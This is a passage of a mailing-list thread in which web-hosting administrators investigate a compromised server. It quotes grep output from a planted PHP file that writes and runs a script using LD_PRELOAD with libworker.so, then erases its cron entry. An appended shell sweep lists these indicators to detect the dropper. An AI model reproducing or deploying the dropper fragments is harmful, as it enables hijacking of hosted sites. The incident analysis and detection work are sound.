<div dir="ltr">OK here is the hack<br>
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@system("killall -9 ".basename("<b>/usr/bin/host</b>"));<br>
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$f = fopen("/usr/bin/host", "rb");<br>
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$HBN=basename("<b>/usr/bin/host</b>");<br>
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@file_put_contents("1.sh",
 "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 
$HBN;export AU='".$AU."'\nexport 
LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab 
-l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");<br></div><div class="gmail_extra"><br><div class="gmail_quote">On Sat, Jun 27, 2015 at 11:21 AM, Gerald Waugh <span dir="ltr">&lt;<a href="mailto:gwaugh@frontstreetnetworks.com" target="_blank">gwaugh@frontstreetnetworks.com</a>&gt;</span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><span class=""><br>
On 06/27/2015 10:51 AM, Michael Stauber wrote:<br>
</span><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
Hi Gerald,<br>
<br><span class="">
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
caching file system admin ???<br>
</blockquote></span>
That's not a standard component of any BlueOnyx version and it's also<br>
not in the 5106R or CentOS5 yum repositories.<br>
<br>
Find out where the binary for that is located:<br>
<br>
which cfsadmin<br>
<br>
Or use "find" for that if "which" doesn't find it.<br>
<br>
Then check which RPM that binary came from:<br>
<br>
rpm -q --whatprovides &lt;path-of-binary&gt;<br>
<br>
That tells you the name of the RPM that it came from. If any.<br>
<br>
If you get an RPM name, you can run "yum info &lt;rpm-name&gt;" on it to see<br>
what info the system has about that RPM.<br>
</blockquote>
Not running now so which showed no results<br>
But found this with locate<br>
<br>
/home/.sites/137/site42/.users/26/cfsadmin<br>
/home/.sites/137/site42/.users/26/cfsadmin/.bash_logout<br>
/home/.sites/137/site42/.users/26/cfsadmin/.bash_profile<br>
/home/.sites/137/site42/.users/26/cfsadmin/.bashrc<br>
/home/.sites/137/site42/.users/26/cfsadmin/.gnome2<br>
/home/.sites/137/site42/.users/26/cfsadmin/Network Trash Folder<br>
/home/.sites/137/site42/.users/26/cfsadmin/Private<br>
/home/.sites/137/site42/.users/26/cfsadmin/dead.letter<br>
/home/.sites/137/site42/.users/26/cfsadmin/mbox<br>
/home/.sites/137/site42/.users/26/cfsadmin/web<br>
/home/.sites/137/site42/users/cfsadmin<br>
<br>
<br>
<br>
</blockquote></div><br><br clear="all"><div><br></div>-- <br><div class="gmail_signature">Gerald Waugh<br><a href="http://www.frontstreetnetworks.com" target="_blank">www.frontstreetnetworks.com</a><br>(318) 734-4779<br></div>
</div>
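A triage sweep for the dropper pattern quoted in the grep output above, as an added example that is not part of the original thread. The indicator strings (LD_PRELOAD, libworker.so, /usr/bin/host, 1.sh) come from that output; the function names and the two-marker threshold are assumptions.

```shell
#!/bin/sh
# Added example, not from the thread. Indicator strings are taken from the
# quoted system.php lines; function names are hypothetical.

# scan_webroot DIR: print PHP files that contain at least two of the three
# markers, so an ordinary mention of /usr/bin/host alone is not reported.
scan_webroot() {
    find "$1" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
        hits=0
        for marker in 'LD_PRELOAD' 'libworker\.so' '/usr/bin/host'; do
            if grep -q -e "$marker" -- "$f" 2>/dev/null; then
                hits=$((hits + 1))
            fi
        done
        if [ "$hits" -ge 2 ]; then
            printf '%s\n' "$f"
        fi
    done
    return 0
}

# find_dropped_libs DIR: shared objects inside a web tree (the script
# preloads ./libworker.so from its own working directory).
find_dropped_libs() {
    find "$1" -type f -name '*.so' 2>/dev/null
}

# cron_hits FILE: lines of a saved crontab (crontab -l -u USER > FILE) that
# run a script named exactly 1.sh, the name the dropper strips on cleanup.
cron_hits() {
    grep -E '(^|[/[:space:]])1\.sh([[:space:]]|$)' -- "$1" || true
}

# Stand-alone use: sh sweep.sh /home/.sites [saved-crontab-file]
if [ -d "${1:-}" ]; then
    echo "== PHP files matching the dropper markers =="
    scan_webroot "$1"
    echo "== shared objects under the web tree =="
    find_dropped_libs "$1"
    if [ -f "${2:-}" ]; then
        echo "== crontab lines referencing 1.sh =="
        cron_hits "$2"
    fi
fi
```

Any hit is a lead to inspect by hand; the site user's crontab and running processes should be checked as well, since the quoted script removes 1.sh and its cron entry after it runs.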